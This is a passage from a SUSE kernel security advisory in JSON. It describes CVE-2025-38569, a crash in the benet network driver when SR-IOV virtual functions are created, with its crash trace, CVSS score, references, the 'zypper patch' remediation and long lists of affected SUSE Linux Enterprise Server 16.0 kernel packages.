"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38551"
},
{
"cve": "CVE-2025-38569",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38569"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbenet: fix BUG when creating VFs\n\nbenet crashes as soon as SRIOV VFs are created:\n\n kernel BUG at mm/vmalloc.c:3457!\n Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\n CPU: 4 UID: 0 PID: 7408 Comm: test.sh Kdump: loaded Not tainted 6.16.0+ #1 PREEMPT(voluntary)\n [...]\n RIP: 0010:vunmap+0x5f/0x70\n [...]\n Call Trace:\n \u003cTASK\u003e\n __iommu_dma_free+0xe8/0x1c0\n be_cmd_set_mac_list+0x3fe/0x640 [be2net]\n be_cmd_set_mac+0xaf/0x110 [be2net]\n be_vf_eth_addr_config+0x19f/0x330 [be2net]\n be_vf_setup+0x4f7/0x990 [be2net]\n be_pci_sriov_configure+0x3a1/0x470 [be2net]\n sriov_numvfs_store+0x20b/0x380\n kernfs_fop_write_iter+0x354/0x530\n vfs_write+0x9b9/0xf60\n ksys_write+0xf3/0x1d0\n do_syscall_64+0x8c/0x3d0\n\nbe_cmd_set_mac_list() calls dma_free_coherent() under a spin_lock_bh.\nFix it by freeing only after the lock has been released.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38569",
"url": "https://www.suse.com/security/cve/CVE-2025-38569"
},
{
"category": "external",
"summary": "SUSE Bug 1248384 for CVE-2025-38569",
"url": "https://bugzilla.suse.com/1248384"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
